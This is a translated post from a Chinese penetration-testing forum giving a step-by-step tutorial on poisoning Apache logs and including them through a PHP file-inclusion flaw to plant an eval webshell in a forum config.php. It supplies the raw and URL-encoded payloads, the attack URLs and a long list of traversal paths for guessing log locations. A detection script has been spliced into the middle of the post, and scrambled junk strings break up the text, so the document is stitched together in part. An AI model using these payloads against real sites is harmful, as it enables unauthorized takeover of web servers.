中国网络渗透测试联盟

Title: PHP include of Apache logs to write a webshell

Author: admin    Time: 2012-9-15 14:27
Since the method above is pretty impractical (in my testing I found the logs are routinely tens of megabytes, which makes it no fun to play with), let's think a bit deeper: we write a truly practical webshell to use, which is also far better than that painfully slow approach above.

For example, still using this one-liner trojan:
<?eval($_POST[cmd]);?>

At this point you may already have thought of it; this is a rather nice approach. Read on: how to write it becomes the question. Use this statement: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes the one-liner trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as PHP, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   // write a one-liner trojan statement into config.php
* }: {6 O( J* w% s$ x& r' V' N6 I$ X# G( c9 d3 m
We submit this, get Apache to record it in the error log, then include the log, and the shell is written successfully. Remember it must be converted to URL-encoded form or it will not work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
6 D/ @% P! W9 J- P; d: N4 V# p
This way the error log has recorded this line of webshell-writing code.
Now we include the log; submit:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

The webshell is now written successfully, and config.php contains the one-liner trojan statement.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Connect to it directly with lanker's client and the host is yours.
2 L* P" |0 L- z2 k% B  G" ^
PS: The prerequisite for everything above is that the directory permissions must be writable; it has to be -rwxrwxrwx (777) to proceed, and here we simply used the directory listed above to check. Everything above is exploitation in the case where the log path is already known.
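The same two-step technique seen from the log-monitoring side, as an added example that is not part of the original post: the script percent-decodes each Apache access_log or error_log line and flags requests that carry PHP code (the poisoning step) and requests whose include parameter points at a log file (the inclusion step). The sample log lines are constructed; the parameter name zizzy is taken from the post.

```python
"""Flag Apache log poisoning and log-file inclusion in log lines.

Added example, not code from the original post. It scans access_log and
error_log lines for both halves of the technique described above: a
request carrying PHP code (the access log keeps it percent-encoded, the
error log records it decoded) and a request whose parameter points an
include() at a log file. The sample lines below are constructed.
"""
import re
from urllib.parse import unquote

# PHP that would execute if a log containing it were ever include()d.
PHP_CODE = re.compile(r"<\?(php|=)?|\beval\s*\(|\$_(POST|GET|REQUEST)\b", re.I)
# Parameter values reaching for a log: traversal, a log directory or a log file name.
LOG_TARGET = re.compile(r"(\.\./){2,}|/logs?/|\b(access|error)[._-]?log\b", re.I)
# Values in a query string; checked separately so the URL path itself is not flagged.
PARAM_VALUE = re.compile(r'[?&][^=&\s]+=([^&\s"]+)')

def decode(s: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly; double encoding is a common evasion."""
    for _ in range(rounds):
        new = unquote(s)
        if new == s:
            break
        s = new
    return s

def scan_log_lines(lines):
    """Return (line_no, reason) for each suspicious line, in order."""
    findings = []
    for no, line in enumerate(lines, 1):
        text = decode(line)
        if PHP_CODE.search(text):
            findings.append((no, "php-code-in-request"))   # poisoning attempt
        if any(LOG_TARGET.search(v) for v in PARAM_VALUE.findall(text)):
            findings.append((no, "log-file-inclusion"))    # include() aimed at a log
    return findings

SAMPLE_LINES = [  # constructed: one benign request, then the two steps from the post
    '1.2.3.4 - - [15/Sep/2012:14:27:01 +0800] "GET /index.php?id=7 HTTP/1.1" 200 512',
    '1.2.3.4 - - [15/Sep/2012:14:27:05 +0800] "GET /%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E HTTP/1.1" 404 210',
    "[Sat Sep 15 14:27:05 2012] [error] [client 1.2.3.4] File does not exist: /var/www/html/<?eval($_POST[cmd]);?>",
    '1.2.3.4 - - [15/Sep/2012:14:27:09 +0800] "GET /z.php?zizzy=../../../../var/log/httpd/error_log HTTP/1.1" 200 40960',
]

if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LINES):
        print(hit)
```

Note that the access-log line only matches after decoding, while the error-log line matches as written, which is exactly why the post insists on URL-encoding the payload.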
2 f& v! J, X$ V5 g) o
For other log paths, you can guess, or refer to these:
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2